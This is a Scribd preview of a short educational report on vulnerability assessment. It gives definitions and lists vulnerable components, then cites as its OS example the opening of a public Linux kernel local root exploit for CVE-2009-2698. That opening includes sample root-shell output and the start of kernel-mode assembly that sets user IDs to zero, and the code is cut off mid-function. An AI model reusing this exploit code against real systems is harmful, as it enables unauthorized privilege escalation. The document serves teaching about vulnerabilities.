Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Look up keyword
Like this
6Activity
0 of .
Results for:
No results containing your search query
P. 1
Vulnerability Assessment Report

Vulnerability Assessment Report

Ratings: (0)|Views: 242|Likes:
Published by Asim Arunava Sahoo

More info:

Published by: Asim Arunava Sahoo on Apr 04, 2010
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOC, PDF, TXT or read online from Scribd
See more
See less

09/12/2013

pdf

text

original

 
Vulnerability Assessment:
A vulnerability Assessment is theprocess of identifying, quantifying, and prioritizing (ranking) thevulnerabilities in a system. The discipline of vulnerabilityassessment comprises host-based vulnerability assessment,related to the inside configuration of a host, and network-basedvulnerability assessment, focused on the vulnerabilities visibleand exploitable on the network.Both kinds of vulnerability assessment arerequired for maximum effectiveness, as vulnerabilities can beexploited by an entity inside the security perimeter (i.e.alegitimate user), or initiated from outside the perimeter, by anunauthorised or illegitimate user.
Remote vs local attacks:Why we need VA ?
 To create a healthy Network.
 To prevent outside (unauthorised) user.
 To be Hack proof 
 To create a secure software
 
What all can be Vulnerable ?
OS (Operating System)
AV (Antivirus)
Firewall
Browsers
Applications (Desktop/Web-Based)
Example(OS)
 
/************************************************************ hoagie_udp_sendmsg.c* LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698** udp_sendmsg bug exploit via (*output) callback function* used in dst_entry / rtable** Bug reported by Tavis Ormandy and Julien Tinnes* of the Google Security Team** Tested with Debian Etch (r0)** $ cat /etc/debian_version* 4.0* $ uname -a* Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686GNU/Linux* $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg* $ ./hoagie_udp_sendmsg* hoagie_udp_sendmsg.c - linux root < 2.6.19 local* -andi / void.at** sh-3.1# id* uid=0(root) gid=0(root)Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)* sh-3.1#** THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY* DAMAGE DONE USING THIS PROGRAM.** VOID.AT Security* andi@void.at* http://www.void.at*************************************************************/#include <stdio.h>#include <stdlib.h>#include <string.h>#include <errno.h>#include <unistd.h>#include <netinet/in.h>#include <arpa/inet.h>#include <sys/socket.h>#include <sys/mman.h>/*** this code will be called from NF_HOOK via (*output) callback in kernel mode*/void set_current_task_uids_gids_to_zero() {asm("push %eax\n""movl $0xffffe000, %eax\n""andl %esp, %eax\n""movl (%eax), %eax\n""movl $0x0, 0x150(%eax)\n""movl $0x0, 0x154(%eax)\n"

Activity (6)

You've already reviewed this. Edit your review.
1 thousand reads
1 thousand reads
1 hundred reads
rprabakar_77 liked this
dumpetrus liked this
Sameer Patil liked this

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->